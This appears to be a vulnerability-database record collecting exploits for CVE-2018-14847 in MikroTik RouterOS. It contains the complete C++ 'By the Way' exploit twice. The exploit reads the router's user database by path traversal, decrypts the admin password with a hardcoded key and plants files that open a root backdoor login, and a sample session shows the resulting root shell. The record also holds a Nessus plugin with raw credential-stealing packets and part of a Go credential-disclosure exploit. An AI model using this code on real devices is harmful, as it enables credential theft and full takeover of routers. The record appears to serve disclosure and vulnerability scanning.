false otherwise.\r\n */\r\n bool parseCommandLine(int p_arg_count, const char* p_arg_array[],\r\n std::string& p_ip, std::string& p_winbox_port)\r\n {\r\n boost::program_options::options_description description(\"options\");\r\n description.add_options()\r\n (\"help,h\", \"A list of command line options\")\r\n (\"version,v\", \"Display version information\")\r\n (\"winbox-port,w\", boost::program_options::value<std::string>()->default_value(\"8291\"), \"The winbox port\")\r\n (\"ip,i\", boost::program_options::value<std::string>(), \"The ip to connect to\");\r\n\r\n boost::program_options::variables_map argv_map;\r\n try\r\n {\r\n boost::program_options::store(\r\n boost::program_options::parse_command_line(\r\n p_arg_count, p_arg_array, description), argv_map);\r\n }\r\n catch (const std::exception& e)\r\n {\r\n std::cerr << e.what() << \"\\n\" << std::endl;\r\n std::cerr << description << std::endl;\r\n return false;\r\n }\r\n\r\n boost::program_options::notify(argv_map);\r\n if (argv_map.empty() || argv_map.count(\"help\"))\r\n {\r\n std::cerr << description << std::endl;\r\n return false;\r\n }\r\n\r\n if (argv_map.count(\"version\"))\r\n {\r\n std::cerr << \"Version: \" << ::s_version << std::endl;\r\n return false;\r\n }\r\n\r\n if (argv_map.count(\"ip\") && argv_map.count(\"winbox-port\"))\r\n {\r\n p_ip.assign(argv_map[\"ip\"].as<std::string>());\r\n p_winbox_port.assign(argv_map[\"winbox-port\"].as<std::string>());\r\n return true;\r\n }\r\n else\r\n {\r\n std::cerr << description << std::endl;\r\n }\r\n\r\n return false;\r\n }\r\n\r\n /*!\r\n * This function uses the file disclosure vulnerability, CVE-2018-14847, to\r\n * download the user database from /flash/rw/store/user.dat\r\n *\r\n * \\param[in] p_ip the address of the router to connect to\r\n * \\param[in] p_winbox_port the winbox port to connect to\r\n * \\return a string containing the user.dat data or an empty string on error\r\n */\r\n std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)\r\n {\r\n std::cout << \"[+] Extracting passwords from \" << p_ip << \":\" << p_winbox_port << std::endl;\r\n Winbox_Session winboxSession(p_ip, p_winbox_port);\r\n if (!winboxSession.connect())\r\n {\r\n std::cerr << \"[!] Failed to connect to the remote host\" << std::endl;\r\n return std::string();\r\n }\r\n\r\n WinboxMessage msg;\r\n msg.set_to(2, 2);\r\n msg.set_command(7);\r\n msg.set_request_id(1);\r\n msg.set_reply_expected(true);\r\n msg.add_string(1, \"//./.././.././../flash/rw/store/user.dat\");\r\n winboxSession.send(msg);\r\n\r\n msg.reset();\r\n if (!winboxSession.receive(msg))\r\n {\r\n std::cerr << \"[!] Error receiving an open file response.\" << std::endl;\r\n return std::string();\r\n }\r\n\r\n boost::uint32_t sessionID = msg.get_session_id();\r\n boost::uint16_t file_size = msg.get_u32(2);\r\n if (file_size == 0)\r\n {\r\n std::cerr << \"[!] File size is 0\" << std::endl;\r\n return std::string();\r\n }\r\n\r\n msg.reset();\r\n msg.set_to(2, 2);\r\n msg.set_command(4);\r\n msg.set_request_id(2);\r\n msg.set_reply_expected(true);\r\n msg.set_session_id(sessionID);\r\n msg.add_u32(2, file_size);\r\n winboxSession.send(msg);\r\n\r\n msg.reset();\r\n if (!winboxSession.receive(msg))\r\n {\r\n std::cerr << \"[!] Error receiving a file content response.\" << std::endl;\r\n return std::string();\r\n }\r\n\r\n return msg.get_raw(0x03);\r\n }\r\n\r\n /*!\r\n * Looks through the user.dat file for an enabled administrative account that\r\n * we can use. Once a useful account is found the password is decrypted.\r\n *\r\n * \\param[in] p_user_dat the user.dat file data\r\n * \\param[in,out] p_username stores the found admin username\r\n * \\param[in,out] p_password stores the found admin password\r\n * \\return true on success and false otherwrise\r\n */\r\n bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)\r\n {\r\n std::cout << \"[+] Searching for administrator credentials \" << std::endl;\r\n\r\n // the dat file is a series of nv::messages preceded by a two byte length\r\n std::string dat(p_user_dat);\r\n while (dat.size() > 4)\r\n {\r\n boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);\r\n if (dat[2] != 'M' || dat[3] != '2')\r\n {\r\n // this is mild insanity but the .dat file messages don't line\r\n // up properly if a new user is added or whatever.\r\n dat.erase(0, 1);\r\n continue;\r\n }\r\n dat.erase(0, 4);\r\n length -= 4;\r\n\r\n if (length > dat.size())\r\n {\r\n return false;\r\n }\r\n\r\n std::string entry(dat.data(), length);\r\n dat.erase(0, length);\r\n\r\n WinboxMessage msg;\r\n msg.parse_binary(entry);\r\n\r\n // we need an active admin account\r\n // 0x2 has three groups: 1 (read), 2 (write), 3 (full)\r\n if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)\r\n {\r\n p_username.assign(msg.get_string(1));\r\n\r\n std::string encrypted_pass(msg.get_string(0x11));\r\n if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)\r\n {\r\n std::string hash_this(p_username);\r\n hash_this.append(\"283i4jfkai3389\");\r\n\r\n MD5 md5;\r\n md5.update(hash_this.c_str(), hash_this.size());\r\n md5.finalize();\r\n std::string md5_hash(md5.getDigest());\r\n\r\n for (std::size_t i = 0; i < encrypted_pass.size(); i++)\r\n {\r\n boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];\r\n if (decrypted == 0)\r\n {\r\n // a null terminator! We did it.\r\n return true;\r\n }\r\n p_password.push_back(decrypted);\r\n }\r\n p_password.clear();\r\n }\r\n }\r\n }\r\n return false;\r\n }\r\n}\r\n\r\n/*!\r\n * This function creates the file /pckg/option on the target. This will enable\r\n * the developer login on Telnet and SSH. Oddly, you'll first need to log in\r\n * to Telnet for SSH to work, but I digress...\r\n *\r\n * \\param[in] p_ip the ip address of the router\r\n * \\param[in] p_port the port of the jsproxy we'll connect to\r\n * \\param[in] p_username the username we'll authenticate with\r\n * \\param[in] p_password the password we'll authenticate with\r\n * \\return true if we successfully created the file.\r\n */\r\nbool create_file(const std::string& p_ip, const std::string& p_port,\r\n const std::string& p_username, const std::string& p_password)\r\n{\r\n Winbox_Session mproxy_session(p_ip, p_port);\r\n if (!mproxy_session.connect())\r\n {\r\n std::cerr << \"[-] Failed to connect to the remote host\" << std::endl;\r\n return false;\r\n }\r\n\r\n boost::uint32_t p_session_id = 0;\r\n if (!mproxy_session.login(p_username, p_password, p_session_id))\r\n {\r\n std::cerr << \"[-] Login failed.\" << std::endl;\r\n return false;\r\n }\r\n\r\n std::cout << \"[+] Creating /pckg/option on \" << p_ip << \":\" << p_port << std::endl;\r\n\r\n WinboxMessage msg;\r\n msg.set_to(2, 2);\r\n msg.set_command(1);\r\n msg.set_request_id(1);\r\n msg.set_reply_expected(true);\r\n msg.set_session_id(p_session_id);\r\n msg.add_string(1, \"//./.././.././../pckg/option\");\r\n mproxy_session.send(msg);\r\n\r\n msg.reset();\r\n mproxy_session.receive(msg);\r\n if (msg.has_error())\r\n {\r\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\r\n return false;\r\n }\r\n\r\n std::cout << \"[+] Creating /flash/nova/etc/devel-login on \" << p_ip << \":\" << p_port << std::endl;\r\n msg.reset();\r\n msg.set_to(2, 2);\r\n msg.set_command(1);\r\n msg.set_request_id(2);\r\n msg.set_reply_expected(true);\r\n msg.set_session_id(p_session_id);\r\n msg.add_string(1, \"//./.././.././../flash/nova/etc/devel-login\");\r\n mproxy_session.send(msg);\r\n\r\n msg.reset();\r\n mproxy_session.receive(msg);\r\n if (msg.has_error())\r\n {\r\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\r\n return false;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nint main(int p_argc, const char** p_argv)\r\n{\r\n std::string ip;\r\n std::string winbox_port;\r\n if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))\r\n {\r\n return EXIT_FAILURE;\r\n }\r\n\r\n std::cout << std::endl;\r\n std::cout << \" \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\" << std::endl;\r\n std::cout << \" \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\" << std::endl;\r\n std::cout << \" \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \" << std::endl;\r\n std::cout << std::endl;\r\n\r\n // step one - do the file disclosure\r\n std::string user_dat(getPasswords(ip, winbox_port));\r\n if (user_dat.empty())\r\n {\r\n return EXIT_FAILURE;\r\n }\r\n\r\n // step two - parse the password\r\n std::string admin_username;\r\n std::string admin_password;\r\n if (!get_password(user_dat, admin_username, admin_password))\r\n {\r\n std::cout << \"[-] Failed to find admin creds. Trying default.\" << std::endl;\r\n admin_username.assign(\"admin\");\r\n admin_password.assign(\"\");\r\n }\r\n\r\n std::cout << \"[+] Using credentials - \" << admin_username << \":\" << admin_password << std::endl;\r\n\r\n // step three - create the file\r\n if (!create_file(ip, winbox_port, admin_username, admin_password))\r\n {\r\n return EXIT_FAILURE;\r\n }\r\n\r\n std::cout << \"[+] There's a light on\" << std::endl;\r\n return EXIT_SUCCESS;\r\n}", "sourceHref": "https://www.exploit-db.com/raw/45578", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "nessus": [{"lastseen": "2023-05-20T14:40:26", "description": "The remote networking device is running a version of MikroTik RouterOS vulnerable to an unauthenticated arbitrary file read and write vulnerability. An unauthenticated attacker could leverage this vulnerability to read or write protected files on the affected host.\nNessus was able to exploit this vulnerability to retrieve the device credential store.", "cvss3": {}, "published": "2018-09-06T00:00:00", "type": "nessus", "title": "MikroTik RouterOS Winbox Unauthenticated Arbitrary File Read/Write Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:mikrotik:routeros"], "id": "MIKROTIK_CVE_2018-14847.NASL", "href": "https://www.tenable.com/plugins/nessus/117335", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117335);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2018-14847\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/01\");\n\n script_name(english:\"MikroTik RouterOS Winbox Unauthenticated Arbitrary File Read/Write Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote networking device is affected by an unauthenticated\narbitrary file read/write vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote networking device is running a version of MikroTik\nRouterOS vulnerable to an unauthenticated arbitrary file read and\nwrite vulnerability. An unauthenticated attacker could leverage this\nvulnerability to read or write protected files on the affected host.\nNessus was able to exploit this vulnerability to retrieve the device\ncredential store.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/BasuCert/WinboxPoC\");\n script_set_attribute(attribute:\"see_also\", value:\"https://n0p.me/winbox-bug-dissection/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.mikrotik.com/security/winbox-vulnerability.html\");\n # https://github.com/tenable/routeros/blob/master/bug_hunting_in_routeros_derbycon_2018.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25ba70ca\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MikroTik RouterOS 6.40.8 / 6.42.1 / 6.43rc4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-14847\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Vulnerability allows reads and writes to the file system\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mikrotik:routeros\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mikrotik_winbox_detect.nasl\");\n script_require_ports(\"Services/mikrotik_winbox\");\n\n exit(0);\n}\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\nfunction pw_dec(user, pass)\n{\n local_var key, i, dec_pass = '';\n key = MD5(user + '283i4jfkai3389');\n for (i = 0; i < strlen(pass); i++)\n {\n dec_pass += raw_string(ord(pass[i]) ^ ord(key[i % strlen(key)]));\n }\n if (stridx(dec_pass, '\\0') <= 0)\n return dec_pass;\n else\n return substr(dec_pass, 0, stridx(dec_pass, '\\0') - 1);\n}\n\npkt_a = 'h\\x01\\x00fM2\\x05\\x00\\xff\\x01\\x06\\x00\\xff\\t\\x05\\x07\\x00\\xff\\t\\x07\\x01\\x00\\x00!5/////./..//////./..//////./../flash/rw/store/user.dat\\x02\\x00\\xff\\x88\\x02\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\xff\\x88\\x02\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00';\n\npkt_b = ';\\x01\\x009M2\\x05\\x00\\xff\\x01\\x06\\x00\\xff\\t\\x06\\x01\\x00\\xfe\\t5\\x02\\x00\\x00\\x08\\x00\\x80\\x00\\x00\\x07\\x00\\xff\\t\\x04\\x02\\x00\\xff\\x88\\x02\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\xff\\x88\\x02\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00';\n\nport = get_service(svc:\"mikrotik_winbox\", exit_on_fail:TRUE);\nuserlist = {};\n\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port);\n\nsend(socket:soc, data:pkt_a);\nres = recv(socket:soc, length:1024);\nif (!res || strlen(res) < 39)\n{\n close(soc);\n audit(AUDIT_RESP_NOT, port);\n}\npkt_b[19] = res[38];\n\nsend(socket:soc, data:pkt_b);\nres = recv(socket:soc, length:1024);\nclose(soc);\nif (!res || stridx(res, '\\x01\\x00\\x00\\x21') == -1)\n audit(AUDIT_LISTEN_NOT_VULN,'MikroTik RouterOS' , port);\n\nforeach entry (split(substr(res, 55), sep:\"M2\", keep:FALSE))\n{\n if (strlen(entry) == 0) continue;\n str = strstr(entry, '\\x01\\x00\\x00\\x21');\n pwstr = strstr(entry, '\\x11\\x00\\x00\\x21');\n if (str && pwstr)\n {\n userlist[substr(str, 5, 4 + ord(str[4]))] = substr(pwstr, 5, 4 + ord(pwstr[4]));\n }\n}\n\nif (userlist)\n{\n report = '';\n report += '\\nNessus was able to enumerate the following username and password pairs\\nfrom the user.dat file:';\n foreach username (keys(userlist))\n {\n report += '\\n Username: ' + data_protection::sanitize_userpass(text:username);\n report += '\\n Password: ' + data_protection::sanitize_userpass(text:pw_dec(user:username, pass:userlist[username])) + '\\n';\n }\n\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse\n audit(AUDIT_LISTEN_NOT_VULN,'MikroTik RouterOS' , port);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-10-11T02:15:57", "description": "", "cvss3": {}, "published": "2018-10-10T00:00:00", "type": "packetstorm", "title": "Mikrotik RouterOS Remote Root", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-10T00:00:00", "id": "PACKETSTORM:149742", "href": "https://packetstormsecurity.com/files/149742/Mikrotik-RouterOS-Remote-Root.html", "sourceData": "`/* \n# Exploit Title: RouterOS Remote Rooting \n# Date: 10/07/2018 \n# Exploit Author: Jacob Baines \n# Vendor Homepage: www.mikrotik.com \n# Software Link: https://mikrotik.com/download \n# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3 \n# Tested on: RouterOS Various \n# CVE : CVE-2018-14847 \n \nBy the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions: \n \nLongterm: 6.30.1 - 6.40.7 \nStable: 6.29 - 6.42 \nBeta: 6.29rc1 - 6.43rc3 \n \nThe exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway \n \nThe exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an \"option\" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user \"devel\" with the admin's password. \n \nMikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here: \n \nhttps://blog.mikrotik.com/security/winbox-vulnerability.html \n \nNote that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials. \n \n# Usage Example \n \nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251 \nTrying 192.168.1.251... \nConnected to 192.168.1.251. \nEscape character is '^]'. \nPassword: \nLogin failed, incorrect username or password \n \nConnection closed by foreign host. \nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251 \n \naa a! a! aa!aa! a!aaa a| a|aaaa! a! \na a(c)aaa!a a aaa$?aa$? aaaaaa$?aa!a \naaa a' a' a' a'aaa aa(c)aa' a' a' \n \n[+] Extracting passwords from 192.168.1.251:8291 \n[+] Searching for administrator credentials \n[+] Using credentials - admin:lol \n[+] Creating /pckg/option on 192.168.1.251:8291 \n[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291 \n[+] There's a light on \nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251 \nTrying 192.168.1.251... \nConnected to 192.168.1.251. \nEscape character is '^]'. \nPassword: \n \n \nBusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash) \nEnter 'help' for a list of built-in commands. \n \n# uname -a \nLinux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown \n# cat /rw/logs/VERSION \nv6.38.4 Mar/08/2017 09:26:17 \n# Connection closed by foreign host. \n*/ \n#include <sstream> \n#include <cstdlib> \n#include <iostream> \n#include <boost/cstdint.hpp> \n#include <boost/program_options.hpp> \n \n#include \"winbox_session.hpp\" \n#include \"winbox_message.hpp\" \n#include \"md5.hpp\" \n \nnamespace \n{ \nconst char s_version[] = \"By the Way 1.0.0\"; \n \n/*! \n* Parses the command line arguments. The program will always use two \n* parameters (ip and winbox port) but the port will default to 8291 if \n* not present on the CLI \n* \n* \\param[in] p_arg_count the number of arguments on the command line \n* \\param[in] p_arg_array the arguments passed on the command line \n* \\param[in,out] p_ip the ip address to connect to \n* \\param[in,out] p_winbox_port the winbox port to connect to \n* \\return true if we have valid ip and ports. false otherwise. \n*/ \nbool parseCommandLine(int p_arg_count, const char* p_arg_array[], \nstd::string& p_ip, std::string& p_winbox_port) \n{ \nboost::program_options::options_description description(\"options\"); \ndescription.add_options() \n(\"help,h\", \"A list of command line options\") \n(\"version,v\", \"Display version information\") \n(\"winbox-port,w\", boost::program_options::value<std::string>()->default_value(\"8291\"), \"The winbox port\") \n(\"ip,i\", boost::program_options::value<std::string>(), \"The ip to connect to\"); \n \nboost::program_options::variables_map argv_map; \ntry \n{ \nboost::program_options::store( \nboost::program_options::parse_command_line( \np_arg_count, p_arg_array, description), argv_map); \n} \ncatch (const std::exception& e) \n{ \nstd::cerr << e.what() << \"\\n\" << std::endl; \nstd::cerr << description << std::endl; \nreturn false; \n} \n \nboost::program_options::notify(argv_map); \nif (argv_map.empty() || argv_map.count(\"help\")) \n{ \nstd::cerr << description << std::endl; \nreturn false; \n} \n \nif (argv_map.count(\"version\")) \n{ \nstd::cerr << \"Version: \" << ::s_version << std::endl; \nreturn false; \n} \n \nif (argv_map.count(\"ip\") && argv_map.count(\"winbox-port\")) \n{ \np_ip.assign(argv_map[\"ip\"].as<std::string>()); \np_winbox_port.assign(argv_map[\"winbox-port\"].as<std::string>()); \nreturn true; \n} \nelse \n{ \nstd::cerr << description << std::endl; \n} \n \nreturn false; \n} \n \n/*! \n* This function uses the file disclosure vulnerability, CVE-2018-14847, to \n* download the user database from /flash/rw/store/user.dat \n* \n* \\param[in] p_ip the address of the router to connect to \n* \\param[in] p_winbox_port the winbox port to connect to \n* \\return a string containing the user.dat data or an empty string on error \n*/ \nstd::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port) \n{ \nstd::cout << \"[+] Extracting passwords from \" << p_ip << \":\" << p_winbox_port << std::endl; \nWinbox_Session winboxSession(p_ip, p_winbox_port); \nif (!winboxSession.connect()) \n{ \nstd::cerr << \"[!] Failed to connect to the remote host\" << std::endl; \nreturn std::string(); \n} \n \nWinboxMessage msg; \nmsg.set_to(2, 2); \nmsg.set_command(7); \nmsg.set_request_id(1); \nmsg.set_reply_expected(true); \nmsg.add_string(1, \"//./.././.././../flash/rw/store/user.dat\"); \nwinboxSession.send(msg); \n \nmsg.reset(); \nif (!winboxSession.receive(msg)) \n{ \nstd::cerr << \"[!] Error receiving an open file response.\" << std::endl; \nreturn std::string(); \n} \n \nboost::uint32_t sessionID = msg.get_session_id(); \nboost::uint16_t file_size = msg.get_u32(2); \nif (file_size == 0) \n{ \nstd::cerr << \"[!] File size is 0\" << std::endl; \nreturn std::string(); \n} \n \nmsg.reset(); \nmsg.set_to(2, 2); \nmsg.set_command(4); \nmsg.set_request_id(2); \nmsg.set_reply_expected(true); \nmsg.set_session_id(sessionID); \nmsg.add_u32(2, file_size); \nwinboxSession.send(msg); \n \nmsg.reset(); \nif (!winboxSession.receive(msg)) \n{ \nstd::cerr << \"[!] Error receiving a file content response.\" << std::endl; \nreturn std::string(); \n} \n \nreturn msg.get_raw(0x03); \n} \n \n/*! \n* Looks through the user.dat file for an enabled administrative account that \n* we can use. Once a useful account is found the password is decrypted. \n* \n* \\param[in] p_user_dat the user.dat file data \n* \\param[in,out] p_username stores the found admin username \n* \\param[in,out] p_password stores the found admin password \n* \\return true on success and false otherwrise \n*/ \nbool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password) \n{ \nstd::cout << \"[+] Searching for administrator credentials \" << std::endl; \n \n// the dat file is a series of nv::messages preceded by a two byte length \nstd::string dat(p_user_dat); \nwhile (dat.size() > 4) \n{ \nboost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]); \nif (dat[2] != 'M' || dat[3] != '2') \n{ \n// this is mild insanity but the .dat file messages don't line \n// up properly if a new user is added or whatever. \ndat.erase(0, 1); \ncontinue; \n} \ndat.erase(0, 4); \nlength -= 4; \n \nif (length > dat.size()) \n{ \nreturn false; \n} \n \nstd::string entry(dat.data(), length); \ndat.erase(0, length); \n \nWinboxMessage msg; \nmsg.parse_binary(entry); \n \n// we need an active admin account \n// 0x2 has three groups: 1 (read), 2 (write), 3 (full) \nif (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false) \n{ \np_username.assign(msg.get_string(1)); \n \nstd::string encrypted_pass(msg.get_string(0x11)); \nif (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0) \n{ \nstd::string hash_this(p_username); \nhash_this.append(\"283i4jfkai3389\"); \n \nMD5 md5; \nmd5.update(hash_this.c_str(), hash_this.size()); \nmd5.finalize(); \nstd::string md5_hash(md5.getDigest()); \n \nfor (std::size_t i = 0; i < encrypted_pass.size(); i++) \n{ \nboost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()]; \nif (decrypted == 0) \n{ \n// a null terminator! We did it. \nreturn true; \n} \np_password.push_back(decrypted); \n} \np_password.clear(); \n} \n} \n} \nreturn false; \n} \n} \n \n/*! \n* This function creates the file /pckg/option on the target. This will enable \n* the developer login on Telnet and SSH. Oddly, you'll first need to log in \n* to Telnet for SSH to work, but I digress... \n* \n* \\param[in] p_ip the ip address of the router \n* \\param[in] p_port the port of the jsproxy we'll connect to \n* \\param[in] p_username the username we'll authenticate with \n* \\param[in] p_password the password we'll authenticate with \n* \\return true if we successfully created the file. \n*/ \nbool create_file(const std::string& p_ip, const std::string& p_port, \nconst std::string& p_username, const std::string& p_password) \n{ \nWinbox_Session mproxy_session(p_ip, p_port); \nif (!mproxy_session.connect()) \n{ \nstd::cerr << \"[-] Failed to connect to the remote host\" << std::endl; \nreturn false; \n} \n \nboost::uint32_t p_session_id = 0; \nif (!mproxy_session.login(p_username, p_password, p_session_id)) \n{ \nstd::cerr << \"[-] Login failed.\" << std::endl; \nreturn false; \n} \n \nstd::cout << \"[+] Creating /pckg/option on \" << p_ip << \":\" << p_port << std::endl; \n \nWinboxMessage msg; \nmsg.set_to(2, 2); \nmsg.set_command(1); \nmsg.set_request_id(1); \nmsg.set_reply_expected(true); \nmsg.set_session_id(p_session_id); \nmsg.add_string(1, \"//./.././.././../pckg/option\"); \nmproxy_session.send(msg); \n \nmsg.reset(); \nmproxy_session.receive(msg); \nif (msg.has_error()) \n{ \nstd::cout << \"[-] \" << msg.get_error_string() << std::endl; \nreturn false; \n} \n \nstd::cout << \"[+] Creating /flash/nova/etc/devel-login on \" << p_ip << \":\" << p_port << std::endl; \nmsg.reset(); \nmsg.set_to(2, 2); \nmsg.set_command(1); \nmsg.set_request_id(2); \nmsg.set_reply_expected(true); \nmsg.set_session_id(p_session_id); \nmsg.add_string(1, \"//./.././.././../flash/nova/etc/devel-login\"); \nmproxy_session.send(msg); \n \nmsg.reset(); \nmproxy_session.receive(msg); \nif (msg.has_error()) \n{ \nstd::cout << \"[-] \" << msg.get_error_string() << std::endl; \nreturn false; \n} \n \nreturn true; \n} \n \nint main(int p_argc, const char** p_argv) \n{ \nstd::string ip; \nstd::string winbox_port; \nif (!parseCommandLine(p_argc, p_argv, ip, winbox_port)) \n{ \nreturn EXIT_FAILURE; \n} \n \nstd::cout << std::endl; \nstd::cout << \" aa a! a! aa!aa! a!aaa a| a|aaaa! a!\" << std::endl; \nstd::cout << \" a a(c)aaa!a a aaa$?aa$? aaaaaa$?aa!a\" << std::endl; \nstd::cout << \" aaa a' a' a' a'aaa aa(c)aa' a' a' \" << std::endl; \nstd::cout << std::endl; \n \n// step one - do the file disclosure \nstd::string user_dat(getPasswords(ip, winbox_port)); \nif (user_dat.empty()) \n{ \nreturn EXIT_FAILURE; \n} \n \n// step two - parse the password \nstd::string admin_username; \nstd::string admin_password; \nif (!get_password(user_dat, admin_username, admin_password)) \n{ \nstd::cout << \"[-] Failed to find admin creds. Trying default.\" << std::endl; \nadmin_username.assign(\"admin\"); \nadmin_password.assign(\"\"); \n} \n \nstd::cout << \"[+] Using credentials - \" << admin_username << \":\" << admin_password << std::endl; \n \n// step three - create the file \nif (!create_file(ip, winbox_port, admin_username, admin_password)) \n{ \nreturn EXIT_FAILURE; \n} \n \nstd::cout << \"[+] There's a light on\" << std::endl; \nreturn EXIT_SUCCESS; \n} \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149742/mikrotikrouteros-exec.txt"}, {"lastseen": "2018-08-18T01:54:27", "description": "", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "packetstorm", "title": "Mikrotik WinBox 6.42 Credential Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2018-08-17T00:00:00", "id": "PACKETSTORM:148958", "href": "https://packetstormsecurity.com/files/148958/Mikrotik-WinBox-6.42-Credential-Disclosure.html", "sourceData": "`/* \n \n# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition ) \n# Author: Maxim Yefimenko ( @slider ) \n# Date: 2018-08-06 \n# Sotware Link: https://mikrotik.com/download \n# Vendor Page: https://www.mikrotik.com/ \n# Version: 6.29 - 6.42 \n# Tested on: Fedora 28 \\ Debian 9 \\ Windows 10 \\ Android ( wherever it was possible to compile.. it's golang ^_^ ) \n# CVE: CVE-2018-14847 \n# References: \n# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/ \n# ( BasuCert ) https://github.com/BasuCert/WinboxPoC \n# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp \n# and special thanks to Dmitriy_Area51 \n \n*/ \n \npackage main \n \nimport ( \n\"crypto/md5\" \n\"fmt\" \n\"net\" \n\"os\" \n\"strings\" \n\"time\" \n) \n \nvar ( \na = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00, \n0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07, \n0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21, \n0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f, 